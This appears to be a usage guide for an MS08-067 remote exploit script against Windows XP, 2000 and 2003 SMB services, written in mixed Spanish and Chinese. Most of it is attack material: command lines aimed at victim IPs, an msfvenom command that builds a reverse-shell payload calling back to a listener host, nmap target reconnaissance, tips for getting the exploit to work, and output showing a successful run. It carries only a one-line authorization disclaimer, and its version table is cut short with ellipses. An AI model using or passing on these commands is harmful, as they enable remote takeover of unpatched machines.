Guía Completa de Uso: # Exploit MS08-067 Mejorado
📌 Uso Básico
python3 Exploit_MS08-067.py <IP_VÍCTIMA> <VERSIÓN_OS> [OPCIONES]
🎯 Ejemplos Prácticos
1. Windows XP SP0/SP1 (Puerto Default 445)
python3 Exploit_MS08-067.py 192.168.1.100 1
2. Windows 2003 SP1 English (Puerto 139)
python3 Exploit_MS08-067.py 192.168.1.150 4 -p 139
3. Con Shellcode Personalizado
python3 Exploit_MS08-067.py 192.168.1.200 6 -s /ruta/mishellcode.bin
🔍 Parámetros Obligatorios
| 参数 | 描述 | 有效值 |
|---|
IP_VÍCTIMA | 目标IP | 任意IPv4 |
VERSIÓN_OS | 易受攻击的操作系统版本 | 1-7(参见表格) |
📋 Tabla de Versiones SOPORTADAS
| 值 | 操作系统 | 架构 |
|---|
| 1 | Windows XP SP0/SP1 通用版 | x86 |
| 2 | Windows 2000 通用版 | x86 |
| ... | ... | ... |
⚙️ Opciones Adicionales
| 选项 | 描述 | 默认值 |
|---|
-p/--port | SMB端口(445/139) | 445 |
-t/--timeout |
🛠️ Generación de Shellcode con msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.201 LPORT=4484 \
EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode \
-a x86 --platform windows
🔎 Identificación del Objetivo
nmap -p 139,445 --script smb-os-discovery <IP_VÍCTIMA>
🚨 Solución de Problemas Comunes
Error: STATUS_OBJECT_NAME_NOT_FOUND
-
检查Browser服务是否运行:
nmap -p 445 --script smb-enum-shares <IP>
-
尝试其他管道(修改脚本):
# Cambiar \\pipe\\browser por \\pipe\\srvsvc
Shellcode no ejecuta
- 检查禁止字符:
\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40
- 使用以下命令验证:
msfvenom -p windows/exec CMD="calc.exe" -f raw | xxd | grep -E "00|0a|0d|5c|5f|2f|2e|40"
💡 Recomendaciones Éticas
✅ 仅在授权环境中使用
❌ 未经许可不得在生产线系统使用
📊 Salida Exitosa Esperada
[*] Targeting 192.168.1.100 | OS: 1 | Port: 445
[+] Connected to 192.168.1.100 on port 445
[*] Sending exploit...
[+] Exploit finished - Check your listener!
⚠️ Nota: Este exploit no funciona en sistemas parcheados con el boletín MS08-067.